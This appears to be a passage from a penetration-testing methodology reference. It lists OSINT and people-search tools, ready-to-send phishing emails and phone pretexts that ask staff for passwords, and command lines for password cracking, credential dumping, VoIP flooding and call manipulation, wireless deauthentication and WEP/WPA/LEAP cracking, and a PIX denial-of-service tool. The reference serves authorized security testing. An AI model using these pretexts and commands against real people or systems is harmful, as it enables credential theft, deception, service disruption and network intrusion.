- Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify)
- Traceroute.org
- Website listing a large number links to online traceroute resources.
- Wayback Machine
- Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
Whois.net
- Tools
Cheops-ng Country whois Domain Research Tool Firefox Plugins
AS Number Shazou Firecat SuiteGnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot
- Internet Search
- General Information
- Web Investigator Tracesmart Friends Reunited Ebay - profiles etc.
- Financial
- EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK
- Phone book/ Electoral Role Information
- 123people
- http://www.123people.co.uk/s/firstname+lastname/world
- 192.com
- Electoral Role Search. UK
- 411
- Online White Pages and Yellow Pages. US
- Abika
- Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
- BT.com. UK
- Residential Business
Pipl
http://pipl.com/search/?FirstName=????&LastName=????&City=&State=&Country=UK&CategoryID=2&Interface=1 http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1 http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
- Spokeo
- http://www.spokeo.com/user?q=domain_name http://www.spokeo.com/user?q=email_address
- Yasni
- http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
- Zabasearch
- People Search Engine. US
- Generic Web Searching
Code Search Forum Entries Google Hacking Database Google
- Back end files
- .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
Email Addresses Contact Details
Newsgroups/forums Blog Search
Yammer Google Blog Search
http://blogsearch.google.com/blogsearch?hl=en&ie=UTF-8&q=????&btnG=Search+Blogs
- Technorati
- http://technorati.com/search/[query]?language=n
Jaiku Present.ly Twitter Network Browser
- Search Engine Comparison/ Aggregator Sites
- Clusty
- http://clusty.com/search?input-form=clusty-simple&v%3Asources=webplus&query=????
- Grokker
- http://live.grokker.com/grokker.html?query=?????&OpenSearch_Yahoo=true&Wikipedia=true&numResults=250
- Zuula
- http://www.zuula.com/SearchResult.jsp?bst=1&prefpg=1&st=????&x=0&y=0
Exalead
http://www.exalead.co.uk/search/results?q=????&x=0&y=0&%24mode=allweb&%24searchlanguages=en
- Delicious
- http://delicious.com/search?p=?????&u=&chk=&context=&fr=del_icio_us&lc=0
Metadata Search
- Metadata can be found within various file formats. Dependant on the file types to be inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc. make the review of documents/ images etc. relating to the target domain a valuable source of information.
- MetaData Visualisation Sites
- TouchGraph Google Browser Kartoo
- Tools
- Bashitsu
- svn checkout http://bashitsu.googlecode.com/svn/trunk/ cat filename | strings | bashitsu-extract-names
Bintext Exif Tool
exiftool -common directory exiftool -r -w .txt -common directory
- FOCA
- Online Version Offline
Hachoir Infocrobes Libextractor
extract -b filename extract filename extract -B country_code filename
- Metadata Extraction Tool
- extract.bat <arg1> <arg2> <arg3>
- Metagoofil
- metagoofil -d target_domain -l max_no_of_files -f all ( or pdf,doc,xls,ppt) -o output_file.html -t directory_to_download_files_to
OOMetaExtractor The Revisionist
./therev ‘’ @/directory ./therev ‘’ site.com ./therev ‘linux’ microsoft.com enWvware
- Wikipedia Metadata Search
- Wikiscanner Wikipedia username checker
Social/ Business Networks
The following sites are some of many social and business related networking entities that are in use today. Dependant on the interests of the people you are researching it may be worth just exploring sites that they have a particular penchant based on prior knowledge from open source research, company biographies etc. i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc.
Finding a persons particular interests may make a potential client side attack more successful if you can find a related “hook” in any potential “spoofed” email sent for them to click on (A Spearphishing technique)
- Note: - This list is not exhaustive and has been limited to those with over 1 million members.
- Africa
- BlackPlanet
- Australia
- Bebo
- Belgium
- Netlog
- Holland
- Hyves
- Hungary
- iWiW
- Iran
- Cloob
- Japan
- Mixi
- Korea
- CyWorld
- Poland
- Grono Nasza-klasa
- Russia
- Odnoklassniki Vkontakte
- Sweden
- LunarStorm
- UK
- FriendsReunited et al Badoo FaceParty
- US
- Classmates Facebook Friendster MyLife.com (formerly Reunion.com) MySpace Windows Live Spaces
- Assorted
Buzznet Care2 Habbo Hi5 Linkedin MocoSpace Naymz Orkut Passado Tagged Twitter Windows Live Spaces Xanga Yahoo! 360° Xing
- Resources
- OSINT International Directory of Search Engines
- DNS Record Retrieval from publically available servers
- Types of Information Records
- SOA Records - Indicates the server that has authority for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host information record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain.
- Database Settings
- Version.bind Serial Refresh Retry Expiry Minimum
Sub Domains Internal IP ranges
Reverse DNS for IP RangeZone Transfer
- Social Engineering
- Remote
- Phone
- Scenarios
- IT Department.”Hi, it’s Zoe from the helpdesk. I am doing a security audit of the networkand I need to re-synchronise the Active Directory usernames and passwords.This is so that your logon process in the morning receives no undue delays”If you are calling from a mobile number, explain that the helpdesk has beenissued a mobile phone for ‘on call’ personnel.
Results Contact Details
Name Phone number Email Room number Department Role
- Scenarios
- Hi there, I am currently carrying out an Active Directory Health Checkfor TARGET COMPANY and require to re-synchronise some outstandingaccounts on behalf of the IT Service Desk. Please reply to medetailing the username and password you use to logon to your desktopin the morning. I have checked with MR JOHN DOE, the IT SecurityAdvisor and he has authorised this request. I will then populate thedatabase with your account details ready for re-synchronisation withActive Directory such that replication of your account will bere-established (this process is transparent to the user and sorequires no further action from yourself). We hope that this exercisewill reduce the time it takes for some users to logon to the network.Best Regards, Andrew Marks Good Morning,The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this ‘opportunity’ to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.Kindest regards,leeEMAIL SIGNATURE
Software Results Contact Details
Name Phone number Email Room number Department RoleOther
- Local
- Personas
- Name
- Suggest same 1st name.
- Phone
- Give work mobile, but remember they have it!
- Have a suitable email address
- Business Cards
- Get cards printed
- Contact Details
- Name Phone number Email Room number Department Role
- Scenarios
- New IT employee
- New IT employee.”Hi, I’m the new guy in IT and I’ve been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don’t they? Can you help me out on this?”Get the following information, try to put a “any problems with it we can help with?” slant on it.UsernameDomainRemote access (Type - Modem/VPN)Remote email (OWA)Most used software?Any comments about the network?Any additional software you would like?What do you think about the security on the network? Password complexity etc.Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure.”Thanks very much and you’ll see the results on the company boards soon.”
- Fire Inspector
- Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace.Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).Check for:number of fire extinguishers, pressure, type.Fire exits, accessibility etc.Look for any information you can get. Try to get on your own, without supervision!
Results Maps
- Satalitte Imagery
- Google Maps
Building layouts
Other
- Dumpster Diving
- Rubbish Bins Contract Waste Removal Ebay ex-stock sales i.e. HDD
- Web Site copy
- htttrack teleport pro Black Widow
Password cracking
- Rainbow crack
ophcrack rainbow tables
rcrack c:rainbowcrack*.rt -f pwfile.txtOphcrack Cain & Abel John the Ripper
./unshadow passwd shadow > file_to_crack ./john -single file_to_crack ./john -w=location_of_dictionary_file -rules file_to_crack ./john -show file_to_crack ./john –incremental:All file_to_crack
- fgdump
- fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
- pwdump6
- pwdump [-h][-o][-u][-p] machineName
medusa LCP L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
Domain credentials Sniffing pwdump import sam import
- aiocracker
- aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
VoIP Security
- Sniffing Tools
- AuthTool Cain & Abel Etherpeek NetDude Oreka PSIPDump SIPomatic SIPv6 Analyzer UCSniff VoiPong VOMIT Wireshark WIST - Web Interface for SIP Trace
- Scanning and Enumeration Tools
enumIAX fping IAX Enumerator iWar Nessus Nmap SIP Forum Test Framework (SFTF) SIPcrack sipflanker
python sipflanker.py 192.168.1-254SIP-Scan SIP.Tastic SIPVicious SiVuS SMAP
smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Addresssnmpwalk VLANping VoIPAudit VoIP GHDB Entries VoIP Voicemail Database
- Packet Creation and Flooding Tools
H.323 Injection Files H225regreject IAXHangup IAXAuthJack IAX.Brute IAXFlooder
./iaxflood sourcename destinationname numpackets
- INVITE Flooder
- ./inviteflood interface target_user target_domain ip_address_target no_of_packets
kphone-ddos RTP Flooder rtpbreak Scapy Seagull SIPBomber SIPNess SIPp SIPsak
Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domainSIP-Send-Fun SIPVicious Spitter TFTP Brute Force
perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
- UDP Flooder
- ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
- UDP Flooder (with VLAN Support)
- ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
Voiphopper
- Fuzzing Tools
- Asteroid Codenomicon VoIP Fuzzers Fuzzy Packet Mu Security VoIP Fuzzing Platform ohrwurm RTP Fuzzer PROTOS H.323 Fuzzer PROTOS SIP Fuzzer SIP Forum Test Framework (SFTF) Sip-Proxy Spirent ThreatEx
- Signaling Manipulation Tools
- AuthTool
- ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
BYE Teardown Check Sync Phone Rebooter RedirectPoison
./redirectpoison interface target_source_ip target_source_port “<contact_information i.e. sip:100.77.50.52;line=xtrfgy>”Registration Adder Registration Eraser Registration Hijacker SIP-Kill SIP-Proxy-Kill SIP-RedirectRTP SipRogue vnak
- Media Manipulation Tools
- RTP InsertSound
- ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
- RTP MixSound
- ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
RTPProxy RTPInject
- Generic Software Suites
OAT Office Communication Server Tool Assessment EnableSecurity VOIPPACK
Note: - Add-on for Immunity Canvas- References
- URL’s
- Common Vulnerabilities and Exploits (CVE)
- Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
Default Passwords Hacking Exposed VoIP
- Tool Pre-requisites
- Hack Library g711conversions
VoIPsa
- White Papers
- An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)
Vulnerability Assessment
- Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
- Manual
Patch Levels Confirmed Vulnerabilities
Severe High Medium Low- Automated
Reports Vulnerabilities
Severe High Medium Low- Tools
GFI Nessus (Linux)
Nessus (Windows)NGS Typhon NGS Squirrel for Oracle NGS Squirrel for SQL SARA MatriXay BiDiBlah SSA Oval Interpreter Xscan Security Manager + Inguma
- Resources
Security Focus Microsoft Security Bulletin Common Vulnerabilities and Exploits (CVE) National Vulnerability Database (NVD) The Open Source Vulnerability Database (OSVDB)
- Standalone Database
- Update URL
United States Computer Emergency Response Team (US-CERT) Computer Emergency Response Team Mozilla Security Information SANS Securiteam PacketStorm Security Security Tracker Secunia Vulnerabilities.org ntbugtraq Wireless Vulnerabilities and Exploits (WVE)
- Blogs
- Carnal0wnage Fsecure Blog g0ne blog GNUCitizen ha.ckers Blog Jeremiah Grossman Blog Metasploit nCircle Blogs pentest mokney.net Rational Security Rise Security Security Fix Blog Software Vulnerability Exploitation Blog Taosecurity Blog
Wireless Penetration
- Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
- Site Map
- RF Map
Lines of Sight Signal Coverage
Standard Antenna Directional Antenna- Physical Map
- Triangulate APs Satellite Imagery
- Network Map
- MAC Filter
- Authorised MAC Addresses Reaction to Spoofed MAC Addresses
- Encryption Keys utilised
- WEP
- Key Length
- Crack Time Key
- WPA/PSK
- TKIP
- Temporal Key Integrity Protocol, (TKIP), is an encryption protocol desgined to replace WEP
- Key Attack Time
- AES
- Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data.
- Key Attack Time
- 802.1x
- Derivative of 802.1x in use
- Access Points
- ESSID
- Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point
- Broadcast ESSIDs
- BSSIDs
- Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks.
- Vendor Channel Associations Rogue AP Activity
- Wireless Clients
- MAC Addresses
- Vendor Operating System Details Adhoc Mode Associations
- Intercepted Traffic
- Encrypted Clear Text
- Wireless Toolkit
- Wireless Discovery
- Aerosol Airfart Aphopper Apradar BAFFLE karma Kismet MiniStumbler Netstumbler Wellenreiter Wifi Hopper WirelessMon
- Packet Capture
- Airopeek Airtraf Apsniff Cain Wireshark
- EAP Attack tools
- eapmd5pass
eapmd5pass -w dictionary_file -r eapmd5-capture.dump
eapmd5pass -w dictionary_file -U username -C EAP-MD5 Challengevalue -R EAP_MD5_Response_value -E 2 EAP-MD5 Response EAP ID Value i.e. -C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2
- Leap Attack Tools
- asleap thc leap cracker anwrap
- WEP/ WPA Password Attack Tools
- Aircrack-ptw Aircrack-ng Airsnort cowpatty wep attack wep crack Airbase wzcook
- Frame Generation Software
Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap
wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]FreeRADIUS - Wireless Pwnage Edition
- Mapping Software
- Knsgem
- File Format Conversion Tools
ns1 recovery and conversion tool warbable warkizniz
warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]ivstools
- IDS Tools
- WIDZ War Scanner Snort-Wireless AirDefense AirMagnet
- WLAN discovery
- Unencrypted WLAN
- Visible SSID
- Sniff for IP range
MAC authorised MAC filtering
- Spoof valid MAC
- Linux
- ifconfig [interface] hw ether [MAC]
- macchanger
- Random Mac Address:- macchanger -r eth0
mac address changer for windows madmacs TMAC SMAC
- Hidden SSID
- Deauth client
- Aireplay-ng
- aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
- Commview
- Tools > Node reassociation
- Void11
- void11_penetration wlan0 -D -t 1 -B [MAC]
- WEP encrypted WLAN
- Visible SSID
- WEPattack
- wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]
- Capture / Inject packets
- Break WEP
- Aircrack-ptw
- aircrack-ptw [pcap file]
- Aircrack-ng
- aircrack -q -n [WEP key length] -b [BSSID] [pcap file]
- Airsnort
- Channel > Start
- WEPcrack
- perl WEPCrack.pl ./pcap-getIV.pl -b 13 -i wlan0
- Hidden SSID
- Deauth client
- Aireplay-ng
- aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
- Commview
- Tools > Node reassociation
- Void11
- void11_hopper void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
- WPA / WPA2 encrypted WLAN
- Deauth client
- Capture EAPOL handshake
- WPA / WPA 2 dictionary attack
- coWPAtty
- ./cowpatty -r [pcap file] -f [wordlist] -s [SSID] ./genpmk -f dictionary_file -d hashfile_name -s ssid ./cowpatty -r cature_file.cap -d hashfile_name -s ssid
- Aircrack-ng
- aircrack-ng -a 2 -w [wordlist] [pcap file]
- LEAP encrypted WLAN
- Deauth client
- Break LEAP
- asleap
- ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash file.dat -n output_index_filename.idx ./genkeys -r dictionary_file -f output_pass+hash file.dat -n output_index_filename.idx
- THC-LEAPcracker
- leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]
- 802.1x WLAN
- Create Rogue Access Point
- Airsnarf
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- fake ap
- perl fakeap.pl –interface wlan0 perl fakeap.pl –interface wlan0 –channel 11 –essid fake_name –wep 1 –key [WEP KEY]
- Hotspotter
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- Karma
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
./bin/karma etc/karma-lan.xml
- Linux rogue AP
- Deauth client
- Associate client
- Compromise client
- Acquire passphrase / certificate
- wzcook Obtain user’s certificate
- Resources
- URL’s
- Wirelessdefence.org Russix Wardrive.net Wireless Vulnerabilities and Exploits (WVE)
- White Papers
- Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware-Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices
- Common Vulnerabilities and Exploits (CVE)
- Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
Penetration
- Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
- Password Attacks
- Known Accounts
- Identified Passwords Unidentified Hashes
- Default Accounts
- Identified Passwords Unidentified Hashes
- Exploits
- Successful Exploits
- Accounts
- Passwords
- Cracked Uncracked
Groups Other Details
Services Backdoor Connectivity
Unsuccessful Exploits Resources
- Securiteam
- Exploits are sorted by year and must be downloaded individually
- SecurityForest
- Updated via CVS after initial install
- GovernmentSecurity
- Need to create and account to obtain access
- Red Base Security
- Oracle Exploit site only
- Wireless Vulnerabilities & Exploits (WVE)
- Wireless Exploit Site
- PacketStorm Security
- Exploits downloadable by month and year but no indexing carried out.
- SecWatch
- Exploits sorted by year and month, download seperately
- SecurityFocus
- Exploits must be downloaded individually
- Metasploit
- Install and regualrly update via svn
- Milw0rm
- Exploit archived indexed and sorted by port download as a whole - The one to go for!
- Tools
- Metasploit
- Free Extra Modules
- local copy
- Manual SQL Injection
Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets
SQL Power Injector SecurityForest SPI Dynamics WebInspect Core Impact Cisco Global Exploiter PIXDos
perl PIXdos.pl [ –device=interface ] [–source=IP] [–dest=IP] [–sourcemac=M AC] [–destmac=MAC] [–port=n]CANVAS Inguma